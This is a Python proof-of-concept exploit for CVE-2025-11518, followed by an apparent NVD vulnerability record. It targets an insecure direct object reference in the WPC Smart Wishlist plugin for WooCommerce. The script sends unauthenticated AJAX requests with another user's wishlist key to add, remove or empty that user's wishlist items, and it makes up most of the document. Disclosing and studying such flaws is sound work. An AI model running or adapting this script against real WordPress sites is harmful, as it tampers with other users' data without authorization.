CVE-2025-11518

# CVE-2025-11518 PoC - WPC Smart Wishlist IDOR Exploit # Exploits missing authorization validation on wishlist key in AJAX endpoints import requests TARGET_URL = "https://target-wordpress-site.com" # The wishlist key can be obtained from shared wishlist URLs or other sources WISHLIST_KEY = "stunning-strong-key-here" # Target user's wishlist key # WordPress AJAX endpoint ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Step 1: Add an item to victim's wishlist via IDOR def add_item_to_wishlist(product_id): """ Exploit IDOR to add a product to another user's wishlist without authentication. """ payload = { "action": "wpcsw_add_to_wishlist", "product_id": str(product_id), "wishlist_key": WISHLIST_KEY # User-controlled key without ownership validation } response = requests.post(ajax_url, data=payload) print(f"[*] Add item response: {response.status_code}") print(f"[*] Response body: {response.text}") return response # Step 2: Empty victim's wishlist via IDOR def empty_wishlist(): """ Exploit IDOR to empty another user's wishlist without authentication. """ payload = { "action": "wpcsw_remove_all_from_wishlist", "wishlist_key": WISHLIST_KEY # User-controlled key without ownership validation } response = requests.post(ajax_url, data=payload) print(f"[*] Empty wishlist response: {response.status_code}") print(f"[*] Response body: {response.text}") return response # Step 3: Remove specific item from victim's wishlist def remove_item_from_wishlist(product_id): """ Exploit IDOR to remove a specific product from another user's wishlist. """ payload = { "action": "wpcsw_remove_from_wishlist", "product_id": str(product_id), "wishlist_key": WISHLIST_KEY } response = requests.post(ajax_url, data=payload) print(f"[*] Remove item response: {response.status_code}") print(f"[*] Response body: {response.text}") return response if __name__ == "__main__": print("[*] CVE-2025-11518 - WPC Smart Wishlist IDOR Exploit") print(f"[*] Target: {TARGET_URL}") print(f"[*] Wishlist Key: {WISHLIST_KEY}") print("-" * 50) # Example: Add product ID 123 to victim's wishlist add_item_to_wishlist(123) # Example: Empty victim's entire wishlist # empty_wishlist() # Example: Remove product ID 456 from victim's wishlist # remove_item_from_wishlist(456)

{"cve": {"id": "CVE-2025-11518", "sourceIdentifier": "[email protected]", "published": "2025-10-11T09:15:32.653", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WPC Smart Wishlist for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.0.3 via several wishlist AJAX functions due to missing validation on a user controlled key that is exposed when wishlists are shared. This makes it possible for unauthenticated attackers to empty and add to other user's wishlists, if they have access to the key."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3375421%40woo-smart-wishlist&new=3375421%40woo-smart-wishlist&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/afe275b4-edc0-4b19-a91f-5099a085e8ce?source=cve", "source": "[email protected]"}]}}